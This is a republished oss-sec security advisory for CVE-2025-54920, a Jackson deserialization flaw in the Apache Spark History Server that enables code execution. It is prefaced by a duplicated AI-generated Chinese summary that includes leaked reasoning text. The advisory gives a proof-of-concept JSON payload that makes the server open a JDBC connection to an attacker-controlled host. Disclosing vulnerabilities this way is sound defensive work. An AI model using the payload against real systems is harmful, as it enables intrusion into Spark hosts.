CVE-2025-54920:Apache Spark Spark History Server 代码执行漏洞分析
嗯,用户让我总结一下这篇文章的内容,控制在100字以内,而且不需要用“文章内容总结”之类的开头。首先,我需要快速浏览文章,抓住关键点。 文章主要讲的是Apache Spark的一个安全漏洞,影响的是3.5.7和4.0.1之前的版本。漏洞出现在Spark History Web UI里,是由于Jackson反序列化过于宽松,导致代码执行漏洞。 攻击者如果能访问事件日志目录,就可以注入恶意JSON,反序列化任意类,从而在History Server上执行命令。这个漏洞的严重性被标记为低级。 总结的时候要包括:漏洞名称、影响版本、问题原因、攻击方式和后果。同时要简洁明了,控制在100字以内。 现在把这些信息整合起来,确保涵盖所有关键点,并且语言流畅自然。 </think> Apache Spark 3.5.4及以下版本中存在代码执行漏洞,源于Spark History Web UI对事件日志数据的Jackson反序列化过于宽松。攻击者可通过注入恶意JSON触发任意类反序列化,在History Server上执行命令。 2026-3-13 21:19:0 Author: seclists.org(查看原文) 阅读量:0 收藏
嗯,用户让我总结一下这篇文章的内容,控制在100字以内,而且不需要用“文章内容总结”之类的开头。首先,我需要快速浏览文章,抓住关键点。 文章主要讲的是Apache Spark的一个安全漏洞,影响的是3.5.7和4.0.1之前的版本。漏洞出现在Spark History Web UI里,是由于Jackson反序列化过于宽松,导致代码执行漏洞。 攻击者如果能访问事件日志目录,就可以注入恶意JSON,反序列化任意类,从而在History Server上执行命令。这个漏洞的严重性被标记为低级。 总结的时候要包括:漏洞名称、影响版本、问题原因、攻击方式和后果。同时要简洁明了,控制在100字以内。 现在把这些信息整合起来,确保涵盖所有关键点,并且语言流畅自然。 </think> Apache Spark 3.5.4及以下版本中存在代码执行漏洞,源于Spark History Web UI对事件日志数据的Jackson反序列化过于宽松。攻击者可通过注入恶意JSON触发任意类反序列化,在History Server上执行命令。 2026-3-13 21:19:0 Author: seclists.org(查看原文) 阅读量:0 收藏
oss-sec mailing list archives
From: Holden Karau <holden () apache org>
Date: Fri, 13 Mar 2026 21:14:32 +0000
Severity: low
Affected versions:
- Apache Spark (org.apache.spark:spark-core_2.13, org.apache.spark:spark-core_2.12) before 3.5.7
- Apache Spark (org.apache.spark:spark-core_2.13, org.apache.spark:spark-core_2.12) 4.0.0 before 4.0.1
Description:
This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and
above, which fixes the issue.
Summary
Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to
overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event
logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command
execution on the host running the Spark History Server.
Details
The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with
@JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the
event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which
can perform network calls or other malicious actions during deserialization.
The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History
Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server
to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability.
Proof of Concept:
1. Run Spark with event logging enabled, writing to a writable directory (spark-logs).
2. Inject the following JSON at the beginning of an event log file:
{
"Event": "org.apache.hive.jdbc.HiveConnection",
"uri": "jdbc:hive2://<IP>:<PORT>/",
"info": {
"hive.metastore.uris": "thrift://<IP>:<PORT>"
}
}
3. Start the Spark History Server with logs pointing to the modified directory.
4. The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection.
Impact
An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server,
potentially compromising the entire system.
This issue is being tracked as SPARK-52381
Credit:
Alexandre Pujol (Linagora) (finder)
References:
https://github.com/apache/spark/pull/51312
https://github.com/apache/spark/pull/51323
https://issues.apache.org/jira/browse/SPARK-52381
https://spark.apache.org/
https://www.cve.org/CVERecord?id=CVE-2025-54920
https://issues.apache.org/jira/browse/SPARK-52381
Current thread:
- CVE-2025-54920: Apache Spark: Spark History Server Code Execution Vulnerability Holden Karau (Mar 13)
文章来源: https://seclists.org/oss-sec/2026/q1/310
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh